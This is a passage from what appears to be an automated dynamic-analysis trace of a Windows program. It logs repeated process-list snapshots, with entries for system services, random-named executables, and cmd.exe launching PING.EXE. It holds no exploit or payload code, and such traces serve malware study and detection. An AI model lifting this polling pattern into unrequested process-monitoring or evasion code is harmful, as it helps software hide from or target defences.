szExeFile="proudlydocumented.exe")) returned 1 [0101.627] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.628] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.629] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.631] CloseHandle (hObject=0xc4) returned 1 [0101.631] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0101.636] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.639] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.646] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.647] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.699] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.710] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.713] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 
[0101.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0101.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="conhost.exe")) returned 1 [0101.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0101.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0101.783] CloseHandle (hObject=0xbc) returned 1 [0101.783] Sleep (dwMilliseconds=0x12c) [0102.111] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0102.116] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.117] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.117] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.118] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.119] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.119] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.120] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.121] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.122] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.123] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.123] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.124] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.125] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.126] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.127] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.128] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.128] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.129] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 